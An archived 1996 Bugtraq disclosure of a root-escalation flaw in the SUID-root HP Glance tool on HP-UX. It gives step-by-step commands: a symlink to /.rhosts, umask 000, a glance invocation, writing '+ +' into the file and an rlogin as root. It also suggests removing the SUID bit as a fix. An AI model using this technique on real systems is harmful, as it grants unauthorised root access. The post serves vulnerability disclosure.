[3385] in bugtraq
Vunerability in HP Glance ?
daemon@ATHENA.MIT.EDU (John W. Jacobi)
Tue Sep 24 18:07:31 1996
Date: Mon, 23 Sep 1996 00:07:03 -0700
Reply-To: jjacobi@NOVA.UMUC.EDU
From: "John W. Jacobi" <jjacobi@NOVA.UMUC.EDU>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Hi again,
If this is out or old, I apologize.
Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04
Product I exploited: HP Glance version B.09.04
What I gained: root access in under a minute without the root password.
Subject: Creating a file as root, with world write permissions using HP
Glance,
while not being root, or truncating any file on the system.
Problem: You could create /.rhosts , /etc/hosts.equiv , or whatever els=
e
your heart desires
and then place arbitrary contents in it. Perhaps in the case of the
r-command files a + +
would suffice. Or you could truncate any file that root can.
Possible short term resolution: Remove the SUID-ROOT thing off of
glance.
How I exploited to get quick root access:
1. I logged in as my regular account.
2. I checked for a root .rhosts file, it did not exist.
3. I made a sym link called /tmp/tempfile to roots would be .rhosts fil=
e
like so:
ln -s /.rhosts /tmp/tempfile
4. I set my umask to 000:
umask 000
5. I ran glance with the following command line:
glance -j 1 -f /tmp/tempfile -iterations 1
6. Thanks to glance the /.rhosts file suddenly appeared and was mode
666, sweet.
7. Next I typed (I could have vi'ed or something as well):
echo "+ +" > /.rhosts
8. Then:
rlogin localhost -l root
9. And, not surprisingly, I was logged in as root.
Of course a little C program would be nice to automate this, but what i=
f
the C
compiler is not installed ? You might still want to be root, wouldn=92=
t
you ???
Question: Since there seems to be many of these little beasties in
HP-UX,
does anyone know if the problem is of a single source, or just a lot of
vulnerable programs.
Any feedback would be greatly appreciated...
John W. Jacobi
